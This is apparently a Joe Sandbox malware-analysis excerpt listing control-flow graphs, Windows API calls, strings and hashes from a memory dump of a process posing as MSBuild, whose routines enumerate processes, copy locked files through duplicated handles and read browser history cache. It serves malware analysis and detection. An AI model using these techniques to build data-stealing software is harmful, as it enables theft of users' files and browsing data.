                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 654 413ee4 648->654 655 413ee7-413efe 648->655 662 413ea2-413eae CloseHandle 650->662 656 413e61-413e68 651->656 657 413e37-413e44 GetModuleHandleW 651->657 654->655 655->638 656->650 658 413e6a-413e77 QueryFullProcessImageNameW 656->658 657->656 660 413e46-413e5c GetProcAddress 657->660 658->650 660->656 662->641
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                    • API String ID: 3536422406-1740548384
                                                                                                                                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                                                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 702 44671d-446726 699->702 701 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->701 711 4467ac-4467b7 __setusermatherr 701->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 701->712 704 446747-44674b 702->704 705 446728-44672d 702->705 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 710 446755-446758 706->710 708->700 709 44673d-446745 708->709 709->710 710->701 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 723 446834-446838 718->723 724 44683a-44683e 718->724 721 446845-44684b 719->721 722 446872-446877 719->722 727 446853-446864 GetStartupInfoW 721->727 728 44684d-446851 721->728 722->719 723->718 723->724 724->721 726 446840-446842 724->726 726->721 729 446866-44686a 727->729 730 446879-44687b 727->730 728->726 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2827331108-0
                                                                                                                                                                                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                    • API String ID: 1157525455-1702587658
                                                                                                                                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                                                                                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 115830560-3916222277
                                                                                                                                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 77810686-1717621600
                                                                                                                                                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
